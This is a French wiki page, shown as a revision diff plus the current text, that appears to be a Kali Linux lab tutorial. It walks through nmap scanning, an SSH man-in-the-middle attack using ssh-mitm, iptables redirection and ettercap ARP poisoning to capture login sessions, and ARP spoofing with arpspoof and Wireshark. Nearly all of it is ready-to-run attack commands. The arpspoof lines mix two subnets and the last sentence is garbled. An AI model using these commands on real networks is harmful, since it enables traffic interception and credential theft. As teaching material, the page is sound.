« Utilisation de Utilisation de Kali » : différence entre les versions

De Travail-ivan
Aucun résumé des modifications
Aucun résumé des modifications
Ligne 15 : Ligne 15 :
  sudo nmap -sV 192.168.56.10
  sudo nmap -sV 192.168.56.10


=== Attaque MITM d’un service SSH ===
=== Faire Attaque MITM d’un service SSH ===


Se déplacer dans le répertoire ssh-mitm
Se déplacer dans le répertoire ssh-mitm
Ligne 50 : Ligne 50 :


  sudo nano /home/ssh-mitm/shell_session_0.txt
  sudo nano /home/ssh-mitm/shell_session_0.txt
=== Faire une Attaque ARP spoofing ===
==== Mise en œuvre de l’attaque ====
Outils à utiliser sur le système attaquant ;
* Wireshark permettant d’analyser les trames transitant par le système attaquant.
* Outil arpspoof permettant d’usurper les communications de couches 2 et 3 (respectivement Ethernet et IPV4). L’installation se fait avec la commande.
Installer le paquet dsniff
sudo apt install dsniff
activer le routage
L’attaquant doit prendre le rôle d’un routeur et doit être paramétré en conséquence. On doit donc
positionner le paramètre d’environnement “forwarding” à la valeur “1” avec la commande :
sudo sysctl -w net.ipv4.conf.all.forwarding=1
Vérifier que le paramètre “forwarding” est bien positionné :
sudo sysctl net.ipv4.conf.all.forwarding
la commande doit retourner la valeur 1
==== Avant l’attaque : Monitorer le trafic transitant via l’attaquant ====
Avant de lancer l’ARP Spoofing, nous allons vérifier le trafic transitant par l’attaquant en lançant l’analyseur de paquets WireShark :
Sur l’attaquant en mode graphique lancer wireshark en indiquant l’interface
d’écoute, dans l’exemple l’interface est « eth0 »:
sudo wireshark -ki eth0
Les commandes à renseigner sur l’attaquant pour l’arpspoofing sont les suivantes :
sudo arpspoof -t 192.168.56.10 192.168.10.254
sudo arpspoof -t 192.168.56.254 192.168.10.10
<big>△</big> Attention, chaque commande doit être lancée dans une session distincte de l’attaquant, car l’exécution d’un processus peut bloquer la saisie d’une autre commande au sein de la même session.
Maintenant via  wiresharp vous voyer toutes les qui transites

Version du 30 novembre 2023 à 20:52

Utilisation de Kali

Découverte des hôtes et services présents sur un réseau local

En tant qu’attaquant, la première étape consiste à recueillir des informations sur le réseau dans lequel nous nous trouvons. Ainsi, à l’aide de l’outil nmap présent sur Kali Linux :

Réaliser un scan du réseau

sudo nmap -sP 192.168.56.0/24

Scanner un hôtes

Afin de savoir quels ports sont ouverts sur ceux-ci et quels services sont proposés

sudo nmap -sV 192.168.56.10

Faire Attaque MITM d’un service SSH

Se déplacer dans le répertoire ssh-mitm

cd ssh-mitm

lancer le service ssh-mitm

sudo ./start.sh

activer le routage

sudo sysctl -w net.ipv4.ip_forward=1

Configurer redirection de ports afin de rediriger tous les flux à destination de la machine attaquante sur le port 22/TCP vers le port 2222 du système Kali Linux

sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

Lancer attaque avec la commande ettercap

sudo ettercap -i eth0 -T -M arp /192.168.56.10// /192.168.56.11//

• -T : lance ettercap en mode texte ; • -M : indique que l'on veut une attaque de type "Man in the middle" ; • 192.168.56.10 (serveur ssh) et 192.168.56.11 (client SSH) sont les adresses IP des victimes

Sur le poste de l’attaquant (Kali), il faut d’arrêter l’attaque ARP Spoofing, taper la touche Q pour arrêter.

arrêter le service ssh-mitm :

sudo ./stop.sh

Aller chercher les information de connexion avec la commande suivante :

sudo nano /home/ssh-mitm/shell_session_0.txt


Faire une Attaque ARP spoofing

Mise en œuvre de l’attaque

Outils à utiliser sur le système attaquant ;

  • Wireshark permettant d’analyser les trames transitant par le système attaquant.
  • Outil arpspoof permettant d’usurper les communications de couches 2 et 3 (respectivement Ethernet et IPV4). L’installation se fait avec la commande.

Installer le paquet dsniff

sudo apt install dsniff

activer le routage

L’attaquant doit prendre le rôle d’un routeur et doit être paramétré en conséquence. On doit donc positionner le paramètre d’environnement “forwarding” à la valeur “1” avec la commande :

sudo sysctl -w net.ipv4.conf.all.forwarding=1

Vérifier que le paramètre “forwarding” est bien positionné :

sudo sysctl net.ipv4.conf.all.forwarding

la commande doit retourner la valeur 1


Avant l’attaque : Monitorer le trafic transitant via l’attaquant

Avant de lancer l’ARP Spoofing, nous allons vérifier le trafic transitant par l’attaquant en lançant l’analyseur de paquets WireShark :

Sur l’attaquant en mode graphique lancer wireshark en indiquant l’interface d’écoute, dans l’exemple l’interface est « eth0 »:

sudo wireshark -ki eth0

Les commandes à renseigner sur l’attaquant pour l’arpspoofing sont les suivantes :

sudo arpspoof -t 192.168.56.10 192.168.10.254
sudo arpspoof -t 192.168.56.254 192.168.10.10

Attention, chaque commande doit être lancée dans une session distincte de l’attaquant, car l’exécution d’un processus peut bloquer la saisie d’une autre commande au sein de la même session.


Maintenant via wiresharp vous voyer toutes les qui transites